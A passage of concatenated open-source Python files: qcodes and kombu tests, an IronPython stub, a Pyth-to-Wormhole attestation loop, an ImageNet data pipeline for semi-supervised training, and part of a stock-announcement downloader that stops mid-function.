assert list(c0_sv2) == [1, 1.5, 1.6, 1.7, 2]
# append and extend
c0_sv3 = c0[2]
# append only works with straight values
c0_sv3.append(2.1)
# extend can use another SweepValue, (even if it only has one value)
c0_sv3.extend(c0[2.2])
# extend can also take a sequence
c0_sv3.extend([2.3])
# as can addition
c0_sv3 += [2.4]
c0_sv4 = c0_sv3 + [2.5, 2.6]
assert list(c0_sv3) == [2, 2.1, 2.2, 2.3, 2.4]
assert list(c0_sv4) == [2, 2.1, 2.2, 2.3, 2.4, 2.5, 2.6]
# len
assert len(c0_sv3) == 5
# in-place and copying reverse
c0_sv.reverse()
c0_sv5 = reversed(c0_sv)
assert list(c0_sv) == [1.7, 1.6, 1.5, 1]
assert list(c0_sv5) == [1, 1.5, 1.6, 1.7]
# multi-key init, where first key is itself a list
c0_sv6 = c0[[1, 3], 4]
# copying
c0_sv7 = c0_sv6.copy()
assert list(c0_sv6) == [1, 3, 4]
assert list(c0_sv7) == [1, 3, 4]
assert not (c0_sv6 is c0_sv7)
def test_base():
p = Parameter('p', get_cmd=None, set_cmd=None)
with pytest.raises(NotImplementedError):
iter(SweepValues(p))
def test_snapshot(c0):
assert c0[0].snapshot() == {
'parameter': c0.snapshot(),
'values': [{'item': 0}]
}
assert c0[0:5:0.3].snapshot()['values'] == [{
'first': 0,
'last': 4.8,
'num': 17,
'type': 'linear'
}]
sv = c0.sweep(start=2, stop=4, num=5)
assert sv.snapshot()['values'] == [{
'first': 2,
'last': 4,
'num': 5,
'type': 'linear'
}]
# mixture of bare items, nested lists, and slices
sv = c0[1, 7, 3.2, [1, 2, 3], 6:9:1, -4.5, 5.3]
assert sv.snapshot()['values'] == [{
'first': 1,
'last': 5.3,
'min': -4.5,
'max': 8,
'num': 11,
'type': 'sequence'
}]
assert (c0[0] + c0[1]).snapshot()['values'] == [
{'item': 0},
{'item': 1}
]
assert (c0[0:3:1] + c0[4, 6, 9]).snapshot()['values'] == [
{'first': 0, 'last': 2, 'num': 3, 'type': 'linear'},
{'first': 4, 'last': 9, 'min': 4, 'max': 9, 'num': 3,
'type': 'sequence'}
]
def test_repr(c0):
sv = c0[0]
assert repr(sv) == (
f'<qcodes.instrument.sweep_values.SweepFixedValues: c0 at {id(sv)}>'
)
|
tools/SDKTool/src/WrappedDeviceAPI/deviceAPI/mobileDevice/android/plugin/Platform_plugin/PlatformWeTest/__init__.py | Passer-D/GameAISDK | 1,210 | 21855 | <reponame>Passer-D/GameAISDK<filename>tools/SDKTool/src/WrappedDeviceAPI/deviceAPI/mobileDevice/android/plugin/Platform_plugin/PlatformWeTest/__init__.py
# -*- coding: utf-8 -*-
"""
Tencent is pleased to support the open source community by making GameAISDK available.
This source code file is licensed under the GNU General Public License Version 3.
For full details, please refer to the file "LICENSE.txt" which is provided as part of this source code package.
Copyright (C) 2020 THL A29 Limited, a Tencent company. All rights reserved.
"""
import platform
__is_windows_system = platform.platform().lower().startswith('window')
__is_linux_system = platform.platform().lower().startswith('linux')
if __is_windows_system:
from .demo_windows.PlatformWeTest import PlatformWeTest
from .demo_windows.common.AdbTool import AdbTool
elif __is_linux_system:
from .demo_ubuntu16.PlatformWeTest import PlatformWeTest
from .demo_ubuntu16.common.AdbTool import AdbTool
else:
raise Exception('system is not support!')
def GetInstance():
return PlatformWeTest()
|
t/unit/utils/test_div.py | kaiix/kombu | 1,920 | 21864 | <reponame>kaiix/kombu<gh_stars>1000+
import pickle
from io import BytesIO, StringIO
from kombu.utils.div import emergency_dump_state
class MyStringIO(StringIO):
def close(self):
pass
class MyBytesIO(BytesIO):
def close(self):
pass
class test_emergency_dump_state:
def test_dump(self, stdouts):
fh = MyBytesIO()
stderr = StringIO()
emergency_dump_state(
{'foo': 'bar'}, open_file=lambda n, m: fh, stderr=stderr)
assert pickle.loads(fh.getvalue()) == {'foo': 'bar'}
assert stderr.getvalue()
assert not stdouts.stdout.getvalue()
def test_dump_second_strategy(self, stdouts):
fh = MyStringIO()
stderr = StringIO()
def raise_something(*args, **kwargs):
raise KeyError('foo')
emergency_dump_state(
{'foo': 'bar'},
open_file=lambda n, m: fh,
dump=raise_something,
stderr=stderr,
)
assert 'foo' in fh.getvalue()
assert 'bar' in fh.getvalue()
assert stderr.getvalue()
assert not stdouts.stdout.getvalue()
|
release/stubs.min/System/Net/__init___parts/TransportContext.py | htlcnn/ironpython-stubs | 182 | 21866 | <filename>release/stubs.min/System/Net/__init___parts/TransportContext.py<gh_stars>100-1000
class TransportContext(object):
""" The System.Net.TransportContext class provides additional context about the underlying transport layer. """
def GetChannelBinding(self,kind):
"""
GetChannelBinding(self: TransportContext,kind: ChannelBindingKind) -> ChannelBinding
Retrieves the requested channel binding.
kind: The type of channel binding to retrieve.
Returns: The requested System.Security.Authentication.ExtendedProtection.ChannelBinding,or null if the
channel binding is not supported by the current transport or by the operating system.
"""
pass
def GetTlsTokenBindings(self):
""" GetTlsTokenBindings(self: TransportContext) -> IEnumerable[TokenBinding] """
pass
|
third_party/pyth/p2w_autoattest.py | dendisuhubdy/wormhole | 695 | 21880 | <reponame>dendisuhubdy/wormhole
#!/usr/bin/env python3
# This script sets up a simple loop for periodical attestation of Pyth data
from pyth_utils import *
from http.client import HTTPConnection
from http.server import HTTPServer, BaseHTTPRequestHandler
import json
import os
import re
import subprocess
import time
import threading
P2W_ADDRESS = "P2WH424242424242424242424242424242424242424"
P2W_ATTEST_INTERVAL = float(os.environ.get("P2W_ATTEST_INTERVAL", 5))
P2W_OWNER_KEYPAIR = os.environ.get(
"P2W_OWNER_KEYPAIR", f"/usr/src/solana/keys/p2w_owner.json")
P2W_ATTESTATIONS_PORT = int(os.environ.get("P2W_ATTESTATIONS_PORT", 4343))
PYTH_ACCOUNTS_HOST = "pyth"
PYTH_ACCOUNTS_PORT = 4242
WORMHOLE_ADDRESS = "Bridge1p5gheXUvJ6jGWGeCsgPKgnE3YgdGKRVCMY9o"
ATTESTATIONS = {
"pendingSeqnos": [],
}
class P2WAutoattestStatusEndpoint(BaseHTTPRequestHandler):
"""
A dumb endpoint for last attested price metadata.
"""
def do_GET(self):
print(f"Got path {self.path}")
sys.stdout.flush()
data = json.dumps(ATTESTATIONS).encode("utf-8")
print(f"Sending:\n{data}")
ATTESTATIONS["pendingSeqnos"] = []
self.send_response(200)
self.send_header("Content-Type", "application/json")
self.send_header("Content-Length", str(len(data)))
self.end_headers()
self.wfile.write(data)
self.wfile.flush()
def serve_attestations():
"""
Run a barebones HTTP server to share Pyth2wormhole attestation history
"""
server_address = ('', P2W_ATTESTATIONS_PORT)
httpd = HTTPServer(server_address, P2WAutoattestStatusEndpoint)
httpd.serve_forever()
# Get actor pubkeys
P2W_OWNER_ADDRESS = sol_run_or_die(
"address", ["--keypair", P2W_OWNER_KEYPAIR], capture_output=True).stdout.strip()
PYTH_OWNER_ADDRESS = sol_run_or_die(
"address", ["--keypair", PYTH_PROGRAM_KEYPAIR], capture_output=True).stdout.strip()
# Top up pyth2wormhole owner
sol_run_or_die("airdrop", [
str(SOL_AIRDROP_AMT),
"--keypair", P2W_OWNER_KEYPAIR,
"--commitment", "finalized",
], capture_output=True)
# Initialize pyth2wormhole
init_result = run_or_die([
"pyth2wormhole-client",
"--log-level", "4",
"--p2w-addr", P2W_ADDRESS,
"--rpc-url", SOL_RPC_URL,
"--payer", P2W_OWNER_KEYPAIR,
"init",
"--wh-prog", WORMHOLE_ADDRESS,
"--owner", P2W_OWNER_ADDRESS,
"--pyth-owner", PYTH_OWNER_ADDRESS,
], capture_output=True, die=False)
if init_result.returncode != 0:
print("NOTE: pyth2wormhole-client init failed, retrying with set_config")
run_or_die([
"pyth2wormhole-client",
"--log-level", "4",
"--p2w-addr", P2W_ADDRESS,
"--rpc-url", SOL_RPC_URL,
"--payer", P2W_OWNER_KEYPAIR,
"set-config",
"--owner", P2W_OWNER_KEYPAIR,
"--new-owner", P2W_OWNER_ADDRESS,
"--new-wh-prog", WORMHOLE_ADDRESS,
"--new-pyth-owner", PYTH_OWNER_ADDRESS,
], capture_output=True)
# Retrieve current price/product pubkeys from the pyth publisher
conn = HTTPConnection(PYTH_ACCOUNTS_HOST, PYTH_ACCOUNTS_PORT)
conn.request("GET", "/")
res = conn.getresponse()
pyth_accounts = None
if res.getheader("Content-Type") == "application/json":
pyth_accounts = json.load(res)
else:
print(f"Bad Content type {res.getheader('Content-Type')}", file=sys.stderr)
sys.exit(1)
price_addr = pyth_accounts["price"]
product_addr = pyth_accounts["product"]
nonce = 0
attest_result = run_or_die([
"pyth2wormhole-client",
"--log-level", "4",
"--p2w-addr", P2W_ADDRESS,
"--rpc-url", SOL_RPC_URL,
"--payer", P2W_OWNER_KEYPAIR,
"attest",
"--price", price_addr,
"--product", product_addr,
"--nonce", str(nonce),
], capture_output=True)
print("p2w_autoattest ready to roll.")
print(f"ACCOUNTS: {pyth_accounts}")
print(f"Attest Interval: {P2W_ATTEST_INTERVAL}")
# Serve p2w endpoint
endpoint_thread = threading.Thread(target=serve_attestations, daemon=True)
endpoint_thread.start()
# Let k8s know the service is up
readiness_thread = threading.Thread(target=readiness, daemon=True)
readiness_thread.start()
seqno_regex = re.compile(r"^Sequence number: (\d+)")
nonce = 1
while True:
attest_result = run_or_die([
"pyth2wormhole-client",
"--log-level", "4",
"--p2w-addr", P2W_ADDRESS,
"--rpc-url", SOL_RPC_URL,
"--payer", P2W_OWNER_KEYPAIR,
"attest",
"--price", price_addr,
"--product", product_addr,
"--nonce", str(nonce),
], capture_output=True)
time.sleep(P2W_ATTEST_INTERVAL)
matches = seqno_regex.match(attest_result.stdout)
if matches is not None:
seqno = int(matches.group(1))
print(f"Got seqno {seqno}")
ATTESTATIONS["pendingSeqnos"].append(seqno)
else:
print(f"Warning: Could not get sequence number")
nonce += 1
readiness_thread.join()
|
milking_cowmask/data_sources/imagenet_data_source.py | deepneuralmachine/google-research | 23,901 | 21891 | <reponame>deepneuralmachine/google-research<gh_stars>1000+
# coding=utf-8
# Copyright 2021 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""ImageNet input pipeline.
"""
import os
import pickle
import jax
import numpy as np
import tensorflow.compat.v1 as tf
import tensorflow_datasets as tfds
TRAIN_IMAGES = 1281167
TEST_IMAGES = 50000
MEAN_RGB = [0.485 * 255, 0.456 * 255, 0.406 * 255]
STDDEV_RGB = [0.229 * 255, 0.224 * 255, 0.225 * 255]
def normalize_image(image):
image -= tf.constant(MEAN_RGB, shape=[1, 1, 3], dtype=image.dtype)
image /= tf.constant(STDDEV_RGB, shape=[1, 1, 3], dtype=image.dtype)
return image
def random_crop(image,
min_object_covered=0.1,
aspect_ratio_range=(0.75, 1.33),
area_range=(0.05, 1.0),
max_attempts=100,):
"""Randomly crop an input image.
Args:
image: The image to be cropped.
min_object_covered: The minimal percentage of the target object that should
be in the final crop.
aspect_ratio_range: The cropped area of the image must have an aspect
ratio = width / height within this range.
area_range: The cropped area of the image must contain a fraction of the
input image within this range.
max_attempts: Number of attempts at generating a cropped region of the image
of the specified constraints. After max_attempts failures,
the original image is returned.
Returns:
A random crop of the supplied image.
"""
bbox = tf.constant([0.0, 0.0, 1.0, 1.0], dtype=tf.float32, shape=[1, 1, 4])
sample_distorted_bounding_box = tf.image.sample_distorted_bounding_box(
tf.shape(image),
bounding_boxes=bbox,
min_object_covered=min_object_covered,
aspect_ratio_range=aspect_ratio_range,
area_range=area_range,
max_attempts=max_attempts,
use_image_if_no_bounding_boxes=True)
bbox_begin, bbox_size, _ = sample_distorted_bounding_box
offset_y, offset_x, _ = tf.unstack(bbox_begin)
target_height, target_width, _ = tf.unstack(bbox_size)
crop = tf.image.crop_to_bounding_box(image, offset_y, offset_x,
target_height, target_width)
return crop
def center_crop(image, image_size, crop_padding=32):
"""Crop an image in the center while preserving aspect ratio.
Args:
image: The image to be cropped.
image_size: the desired crop size.
crop_padding: minimal distance of the crop from the edge of the image.
Returns:
The center crop of the provided image.
"""
shape = tf.shape(image)
image_height = shape[0]
image_width = shape[1]
padded_center_crop_size = tf.cast(
((image_size / (image_size + crop_padding)) *
tf.cast(tf.minimum(image_height, image_width), tf.float32)),
tf.int32)
offset_height = ((image_height - padded_center_crop_size) + 1) // 2
offset_width = ((image_width - padded_center_crop_size) + 1) // 2
crop = tf.image.crop_to_bounding_box(image, offset_height, offset_width,
padded_center_crop_size,
padded_center_crop_size)
return crop
def colour_jitter(image, greyscale_prob=0.0):
"""Colour jitter augmentation.
Args:
image: The image to be augmented
greyscale_prob: probability of greyscale conversion
Returns:
Augmented image
"""
# Make sure it has 3 channels so random_saturation and random_hue don't
# fail on greyscale images
image = image * tf.ones([1, 1, 3], dtype=image.dtype)
if greyscale_prob > 0.0:
def f_grey():
return tf.image.rgb_to_grayscale(image)
def f_colour():
image_col = tf.image.random_saturation(image, 0.7, 1.4)
image_col = tf.image.random_hue(image_col, 0.1)
return image_col
p = tf.random.uniform([1])
image = tf.cond(tf.less(p[0], greyscale_prob), f_grey, f_colour)
else:
image = tf.image.random_saturation(image, 0.7, 1.4)
image = tf.image.random_hue(image, 0.1)
image = tf.image.random_contrast(image, 0.7, 1.4)
image = tf.image.random_brightness(image, 0.4)
return image
def preprocess_train_image(image, apply_colour_jitter=False,
greyscale_prob=0.0, image_size=224):
"""Preprocess a raw ImageNet image for training or evaluation.
Args:
image: The image to be preprocessed.
apply_colour_jitter: If True, apply colour jitterring.
greyscale_prob: Probability of converting image to greyscale.
image_size: The target size of the image.
Returns:
The pre-processed image.
"""
image = random_crop(image)
image = tf.image.resize([image],
[image_size, image_size],
method=tf.image.ResizeMethod.BICUBIC
)[0]
# Randomly flip the image horizontally.
image = tf.image.random_flip_left_right(image)
if apply_colour_jitter:
image = colour_jitter(image, greyscale_prob=greyscale_prob)
image = normalize_image(image)
return image
def preprocess_eval_image(image, image_size=224):
"""Preprocess a raw ImageNet image for training or evaluation.
Args:
image: The image to be preprocessed.
image_size: The target size of the image.
Returns:
The pre-processed image.
"""
image = center_crop(image, image_size)
image = tf.image.resize([image],
[image_size, image_size],
method=tf.image.ResizeMethod.BICUBIC
)[0]
image = normalize_image(image)
return image
_JPEG_ENCODED_FEATURE_DESCRIPTION = {
'label': tf.io.FixedLenFeature([], tf.int64, default_value=0),
'image': tf.io.FixedLenFeature([], tf.string),
'file_name': tf.io.FixedLenFeature([], tf.string),
}
def _filter_tfds_by_file_name(in_ds, subset_filenames):
kv_init = tf.lookup.KeyValueTensorInitializer(
np.array(subset_filenames), np.ones((len(subset_filenames),), dtype=int),
key_dtype=tf.string, value_dtype=tf.int64)
ht = tf.lookup.StaticHashTable(kv_init, 0)
def pred_fn(x):
return tf.equal(ht.lookup(x['file_name']), 1)
return in_ds.filter(pred_fn)
def _deserialize_and_decode_jpeg(serialized_sample):
sample = tf.io.parse_single_example(serialized_sample,
_JPEG_ENCODED_FEATURE_DESCRIPTION)
sample['image'] = tf.io.decode_jpeg(sample['image'])
return sample
def _deserialize_sample(serialized_sample):
return tf.io.parse_example(serialized_sample,
_JPEG_ENCODED_FEATURE_DESCRIPTION)
def _decode_jpeg(sample):
image = tf.io.decode_jpeg(sample['image'])
return dict(label=sample['label'], file_name=sample['file_name'], image=image)
def deserialize_and_decode_image_dataset(ds, batch_size):
if batch_size is not None and batch_size > 1:
return ds.batch(batch_size).map(
_deserialize_sample,
num_parallel_calls=tf.data.experimental.AUTOTUNE).unbatch().map(
_decode_jpeg, num_parallel_calls=tf.data.experimental.AUTOTUNE)
else:
return ds.map(_deserialize_and_decode_jpeg,
num_parallel_calls=tf.data.experimental.AUTOTUNE)
def _load_tfds_imagenet(split_name, n_total):
"""Load ImageNet from TFDS."""
split_size = float(n_total) // jax.host_count()
start = split_size * jax.host_id()
end = start + split_size
start_index = int(round(start))
end_index = int(round(end))
split = '{}[{}:{}]'.format(split_name, start_index, end_index)
return tfds.load('imagenet2012:5.*.*', split=split)
def _load_custom_imagenet_split(split_path):
"""Load a custom split of the ImageNet dataset."""
if not tf.io.gfile.exists(split_path):
raise RuntimeError('Cannot find {}'.format(split_path))
shard_filenames = tf.io.gfile.listdir(split_path)
shard_filenames.sort()
if jax.host_count() > 1:
n_hosts = jax.host_count()
host_id = jax.host_id()
shard_filenames = [f for i, f in enumerate(shard_filenames)
if (i % n_hosts) == host_id]
files_in_split = [os.path.join(split_path, f) for f in shard_filenames]
ds = tf.data.TFRecordDataset(files_in_split, buffer_size=128 * 1024 * 1024,
num_parallel_reads=len(files_in_split))
# ds = deserialize_and_decode_image_dataset(ds, batch_size=256)
ds = deserialize_and_decode_image_dataset(ds, batch_size=1)
return ds
_SUP_PATH_PAT = r'{imagenet_subset_dir}/imagenet_{n_sup}_seed{subset_seed}'
_VAL_TVSPLIT_PATH_PAT = r'{imagenet_subset_dir}/imagenet_tv{n_val}s{val_seed}_split.pkl'
_VAL_PATH_PAT = r'{imagenet_subset_dir}/imagenet_tv{n_val}s{val_seed}_val'
_VAL_SUP_PATH_PAT = r'{imagenet_subset_dir}/imagenet_tv{n_val}s{val_seed}_{n_sup}_seed{subset_seed}'
class ImageNetDataSource(object):
"""ImageNet data source.
Attributes:
n_train: number of training samples
n_sup: number of supervised samples
n_val: number of validation samples
n_test: number of test samples
train_semisup_ds: Semi-supervised training dataset
train_unsup_ds: Unsupervised training dataset
train_sup_ds: Supervised training dataset
val_ds: Validation dataset
test_ds: Test dataset
n_classes: Number of classes
"""
def __init__(self, imagenet_subset_dir, n_val, n_sup, train_batch_size,
eval_batch_size, augment_twice, apply_colour_jitter=False,
greyscale_prob=0.0, load_test_set=True, image_size=224,
subset_seed=12345, val_seed=131):
if n_val == 0:
# We are using the complete ImageNet training set for traininig
# No samples are being held out for validation
# Draw unsupervised samples from complete training set
train_unsup_ds = _load_tfds_imagenet('train', TRAIN_IMAGES)
self.n_train = TRAIN_IMAGES
if n_sup == -1 or n_sup == TRAIN_IMAGES:
# All training samples are supervised
train_sup_ds = train_unsup_ds
self.n_sup = TRAIN_IMAGES
else:
sup_path = _SUP_PATH_PAT.format(
imagenet_subset_dir=imagenet_subset_dir, n_sup=n_sup,
subset_seed=subset_seed)
train_sup_ds = _load_custom_imagenet_split(sup_path)
self.n_sup = n_sup
val_ds = None
self.n_val = 0
else:
# A validation set has been requested
# Load the pickle file that tells us which file names are train / val
tvsplit_path = _VAL_TVSPLIT_PATH_PAT.format(
imagenet_subset_dir=imagenet_subset_dir, n_val=n_val,
val_seed=val_seed)
with tf.io.gfile.GFile(tvsplit_path, 'rb') as f_tvsplit:
tvsplit = pickle.load(f_tvsplit)
train_fn = tvsplit['train_fn']
# Filter the dataset to select samples in the training set
trainval_ds = _load_tfds_imagenet('train', TRAIN_IMAGES)
train_unsup_ds = _filter_tfds_by_file_name(trainval_ds, train_fn)
self.n_train = len(train_fn)
# Load the validation set from a custom dataset
val_path = _VAL_PATH_PAT.format(imagenet_subset_dir=imagenet_subset_dir,
n_val=n_val,
val_seed=val_seed)
val_ds = _load_custom_imagenet_split(val_path)
self.n_val = n_val
if n_sup == -1 or n_sup == len(train_fn):
# All training samples are supervised
train_sup_ds = train_unsup_ds
self.n_sup = len(train_fn)
else:
sup_path = _VAL_SUP_PATH_PAT.format(
imagenet_subset_dir=imagenet_subset_dir, n_val=n_val,
val_seed=val_seed, n_sup=n_sup,
subset_seed=subset_seed)
train_sup_ds = _load_custom_imagenet_split(sup_path)
self.n_sup = n_sup
train_sup_ds = train_sup_ds.repeat()
train_sup_ds = train_sup_ds.shuffle(8 * train_batch_size)
train_unsup_ds = train_unsup_ds.repeat()
train_unsup_ds = train_unsup_ds.shuffle(8 * train_batch_size)
train_semisup_ds = tf.data.Dataset.zip((train_sup_ds, train_unsup_ds))
def _augment_sup(sup_sample):
"""Augment supervised sample."""
sample = {
'sup_image': preprocess_train_image(
sup_sample['image'], apply_colour_jitter=apply_colour_jitter,
greyscale_prob=greyscale_prob, image_size=image_size),
'sup_label': sup_sample['label'],
}
return sample
def _augment_unsup_once(unsup_sample):
"""Augment unsupervised sample, single augmentation."""
unsup_x0 = preprocess_train_image(
unsup_sample['image'], apply_colour_jitter=apply_colour_jitter,
greyscale_prob=greyscale_prob, image_size=image_size)
sample = {
'unsup_image0': unsup_x0,
'unsup_image1': unsup_x0,
}
return sample
def _augment_unsup_twice(unsup_sample):
"""Augment unsupervised sample, two augmentations."""
sample = {
'unsup_image0': preprocess_train_image(
unsup_sample['image'], apply_colour_jitter=apply_colour_jitter,
greyscale_prob=greyscale_prob, image_size=image_size),
'unsup_image1': preprocess_train_image(
unsup_sample['image'], apply_colour_jitter=apply_colour_jitter,
greyscale_prob=greyscale_prob, image_size=image_size),
}
return sample
def _augment_semisup_once(sup_sample, unsup_sample):
"""Augment semi-supervised sample, single augmentation."""
unsup_x0 = preprocess_train_image(
unsup_sample['image'], apply_colour_jitter=apply_colour_jitter,
greyscale_prob=greyscale_prob, image_size=image_size)
semisup_sample = {
'sup_image': preprocess_train_image(
sup_sample['image'], apply_colour_jitter=apply_colour_jitter,
greyscale_prob=greyscale_prob, image_size=image_size),
'sup_label': sup_sample['label'],
'unsup_image0': unsup_x0,
'unsup_image1': unsup_x0,
}
return semisup_sample
def _augment_semisup_twice(sup_sample, unsup_sample):
"""Augment semi-supervised sample, two augmentations."""
semisup_sample = {
'sup_image': preprocess_train_image(
sup_sample['image'], apply_colour_jitter=apply_colour_jitter,
greyscale_prob=greyscale_prob, image_size=image_size),
'sup_label': sup_sample['label'],
'unsup_image0': preprocess_train_image(
unsup_sample['image'], apply_colour_jitter=apply_colour_jitter,
greyscale_prob=greyscale_prob, image_size=image_size),
'unsup_image1': preprocess_train_image(
unsup_sample['image'], apply_colour_jitter=apply_colour_jitter,
greyscale_prob=greyscale_prob, image_size=image_size),
}
return semisup_sample
def _process_eval_sample(x):
"""Pre-process evaluation sample."""
image = preprocess_eval_image(x['image'], image_size=image_size)
batch = {'image': image, 'label': x['label']}
return batch
if augment_twice:
train_semisup_ds = train_semisup_ds.map(_augment_semisup_twice,
num_parallel_calls=128)
train_unsup_only_ds = train_unsup_ds.map(_augment_unsup_twice,
num_parallel_calls=128)
else:
train_semisup_ds = train_semisup_ds.map(_augment_semisup_once,
num_parallel_calls=128)
train_unsup_only_ds = train_unsup_ds.map(_augment_unsup_once,
num_parallel_calls=128)
train_sup_only_ds = train_sup_ds.map(_augment_sup,
num_parallel_calls=128)
train_semisup_ds = train_semisup_ds.batch(train_batch_size,
drop_remainder=True)
train_unsup_only_ds = train_unsup_only_ds.batch(train_batch_size,
drop_remainder=True)
train_sup_only_ds = train_sup_only_ds.batch(train_batch_size,
drop_remainder=True)
train_semisup_ds = train_semisup_ds.prefetch(10)
train_unsup_only_ds = train_unsup_only_ds.prefetch(10)
train_sup_only_ds = train_sup_only_ds.prefetch(10)
self.train_semisup_ds = train_semisup_ds
self.train_unsup_ds = train_unsup_only_ds
self.train_sup_ds = train_sup_only_ds
#
# Validation set
#
if n_val > 0:
val_ds = val_ds.cache()
val_ds = val_ds.map(_process_eval_sample, num_parallel_calls=128)
val_ds = val_ds.batch(eval_batch_size)
val_ds = val_ds.repeat()
val_ds = val_ds.prefetch(10)
self.val_ds = val_ds
else:
self.val_ds = None
if load_test_set:
#
# Test set
#
test_ds = _load_tfds_imagenet('validation', TEST_IMAGES)
test_ds = test_ds.cache()
test_ds = test_ds.map(_process_eval_sample, num_parallel_calls=128)
test_ds = test_ds.batch(eval_batch_size)
test_ds = test_ds.repeat()
test_ds = test_ds.prefetch(10)
self.test_ds = test_ds
self.n_test = TEST_IMAGES
else:
self.test_ds = None
self.n_test = 0
self.n_classes = 1000
|
StockAnalysisSystem/ui/Extension/recycled/announcement_downloader.py | SleepySoft/StockAnalysisSystem | 138 | 21895 | <reponame>SleepySoft/StockAnalysisSystem<filename>StockAnalysisSystem/ui/Extension/recycled/announcement_downloader.py<gh_stars>100-1000
import time
import urllib
import random
import logging
import requests
import datetime
from os import sys, path, makedirs
from PyQt5.QtCore import Qt, QTimer, QDateTime
from PyQt5.QtWidgets import QWidget, QPushButton, QVBoxLayout, QLabel, QComboBox, QDateTimeEdit, QCheckBox, QLineEdit, \
QRadioButton
root_path = path.dirname(path.dirname(path.abspath(__file__)))
from StockAnalysisSystem.core.Utility.common import *
from StockAnalysisSystem.core.Utility.ui_utility import *
from StockAnalysisSystem.core.Utility.task_queue import *
from StockAnalysisSystem.core.Utility.time_utility import *
from StockAnalysisSystem.ui.Utility.ui_context import UiContext
from StockAnalysisSystem.interface.interface import SasInterface as sasIF
from StockAnalysisSystem.core.Utility.securities_selector import SecuritiesSelector
# 20200217: It doesn't work anymore - Move to recycled
# -------------------------------------------- class AnnouncementDownloader --------------------------------------------
# -----------------------------------------------------------
# Get code from : https://github.com/gaodechen/cninfo_process
# -----------------------------------------------------------
User_Agent = [
"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET CLR 2.0.50727; Media Center PC 6.0)",
"Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET CLR 1.0.3705; .NET CLR 1.1.4322)",
"Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.04506.30)",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN) AppleWebKit/523.15 (KHTML, like Gecko, Safari/419.3) Arora/0.3 (Change: 287 c9dfb30)",
"Mozilla/5.0 (X11; U; Linux; en-US) AppleWebKit/527+ (KHTML, like Gecko, Safari/419.3) Arora/0.6",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.2pre) Gecko/20070215 K-Ninja/2.1.1",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9) Gecko/20080705 Firefox/3.0 Kapiko/3.0"
]
headers = {'Accept': 'application/json, text/javascript, */*; q=0.01',
"Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
"Accept-Encoding": "gzip, deflate",
"Accept-Language": "zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-HK;q=0.6,zh-TW;q=0.5",
'Host': 'www.cninfo.com.cn',
'Origin': 'http://www.cninfo.com.cn',
'Referer': 'http://www.cninfo.com.cn/new/commonUrl?url=disclosure/list/notice',
'X-Requested-With': 'XMLHttpRequest'
}
class AnnouncementDownloader:
def __init__(self):
pass
@staticmethod
def format_query_time_range(time_range: any) -> str:
if time_range is None:
return AnnouncementDownloader.format_query_time_range((years_ago(3), now()))
if isinstance(time_range, str):
return time_range
if isinstance(time_range, datetime.datetime):
return AnnouncementDownloader.format_query_time_range((time_range, time_range))
if not isinstance(time_range, (tuple, list)):
return AnnouncementDownloader.format_query_time_range(None)
if len(time_range) == 0:
return AnnouncementDownloader.format_query_time_range(None)
if len(time_range) == 1:
return AnnouncementDownloader.format_query_time_range((time_range[0], time_range[0]))
since = time_range[0]
until = time_range[1]
return '%s+~+%s' % (since.strftime('%Y-%m-%d'), until.strftime('%Y-%m-%d'))
@staticmethod
def get_szse_annual_report_pages(page: int, stock: str, time_range: any = None):
query_path = 'http://www.cninfo.com.cn/new/hisAnnouncement/query'
headers['User-Agent'] = random.choice(User_Agent) # 定义User_Agent
time_range = AnnouncementDownloader.format_query_time_range(time_range)
query = {'pageNum': page, # 页码
'pageSize': 30,
'tabName': 'fulltext',
'column': 'szse', # 深交所
'stock': stock,
'searchkey': '',
'secid': '',
'plate': 'sz',
'category': 'category_ndbg_szsh;', # 年度报告
'trade': '',
'seDate': time_range,
}
namelist = requests.post(query_path, headers=headers, data=query)
return namelist.json()['announcements']
@staticmethod
def get_sse_annual_report_pages(page: int, stock: str, time_range: any = None):
query_path = 'http://www.cninfo.com.cn/new/hisAnnouncement/query'
headers['User-Agent'] = random.choice(User_Agent) # 定义User_Agent
time_range = AnnouncementDownloader.format_query_time_range(time_range)
query = {'pageNum': page, # 页码
'pageSize': 30,
'tabName': 'fulltext',
'column': 'sse',
'stock': stock,
'searchkey': '',
'secid': '',
'plate': 'sh',
'category': 'category_ndbg_szsh;', # 年度报告
'trade': '',
'seDate': time_range
}
namelist = requests.post(query_path, headers=headers, data=query)
return namelist.json()['announcements'] # json中的年度报告信息
@staticmethod
def execute_download(report_pages, include_filter: [str] or None = None,
exclude_filter: [str] or None = None, quit_flag: [bool] = None):
if report_pages is None:
return
# download_headers = {
# 'Accept': 'application/json, text/javascript, */*; q=0.01',
# 'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',
# 'Accept-Encoding': 'gzip, deflate',
# 'Accept-Language': 'zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-HK;q=0.6,zh-TW;q=0.5',
# 'Host': 'www.cninfo.com.cn',
# 'Origin': 'http://www.cninfo.com.cn'
# }
# download_headers['User-Agent'] = random.choice(User_Agent)
download_path = 'http://static.cninfo.com.cn/'
for page in report_pages:
if quit_flag is not None and quit_flag[0]:
break
title = page['announcementTitle']
allowed = AnnouncementDownloader.check_filter_allowed(title, include_filter, exclude_filter)
if not allowed:
print(' %s -> Ignore' % title)
continue
print(' %s -> Download' % title)
download = download_path + page["adjunctUrl"]
